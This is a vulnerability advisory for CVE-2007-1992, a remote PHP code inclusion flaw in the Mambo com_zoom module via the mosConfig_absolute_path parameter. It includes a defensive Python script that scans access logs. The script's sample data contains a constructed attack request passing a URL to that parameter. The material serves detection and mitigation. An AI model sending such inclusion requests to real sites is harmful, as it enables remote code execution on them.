PT-2007-3337 · Mambo · Com Zoom

Iskorpitx · Published 2007-04-12 · Updated 2017-10-11 · CVE-2007-1992

CVSS v2.0: 7.5 (High)

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions

com_zoom module for Mambo versions 2.5 beta 2 and earlier

Description

The issue allows remote attackers to execute arbitrary PHP code. This is achieved by providing a URL in the mosConfig_absolute_path parameter to specific PHP files, including (1) EXIF_Makernote.php or (2) EXIF.php in the classes/iptc/ directory.

Recommendations

For com_zoom module for Mambo versions 2.5 beta 2 and earlier, consider disabling access to the EXIF_Makernote.php and EXIF.php files in the classes/iptc/ directory until a patch is available. Avoid using the mosConfig_absolute_path parameter in the affected module to minimize the risk of exploitation.
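To check whether the two scripts named above are being requested, and whether access to them is actually blocked, a web server access log can be triaged as in the following added example (not part of the original advisory or of the com_zoom code). It assumes Apache common/combined log format; the sample lines, addresses, host name and the /components/com_zoom/ install prefix are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script paths and parameter name are from the advisory; only the path suffix
# is matched because the install prefix varies per site.
TARGETS = ("/classes/iptc/exif_makernote.php", "/classes/iptc/exif.php")
PARAM = "mosConfig_absolute_path"
HAS_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

def classify(line):
    """Return None for unrelated lines, else a dict describing the request."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if not unquote(url.path).lower().endswith(TARGETS):
        return None
    # parse_qs percent-decodes once, so an encoded URL value is still caught.
    # Only the query string is visible here; request bodies are not logged.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    if any(HAS_SCHEME.match(v) for v in values):
        verdict = "url-in-parameter"
    elif values:
        verdict = "parameter-supplied"
    else:
        verdict = "direct-access"
    return {"client": client, "status": int(status), "verdict": verdict}

def scan(lines):
    """Classify every line and keep only requests to the affected scripts."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation addresses, .invalid host name).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2007:10:00:00 +0000] "GET /index.php?option=com_zoom HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Apr/2007:10:00:05 +0000] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http%3A%2F%2Fhost.invalid%2Fx HTTP/1.1" 200 312',
    '198.51.100.7 - - [12/Apr/2007:10:00:09 +0000] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php HTTP/1.1" 403 199',
    '203.0.113.4 - - [12/Apr/2007:10:01:00 +0000] "GET /components/com_zoom/classes/iptc/exif.php?mosConfig_absolute_path=/srv/www HTTP/1.1" 404 150',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status on any hit means the script is still reachable, so the access restriction from the Recommendations is not in effect for that request.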

Related Identifiers

CVE-2007-1992

Affected Products

Com Zoom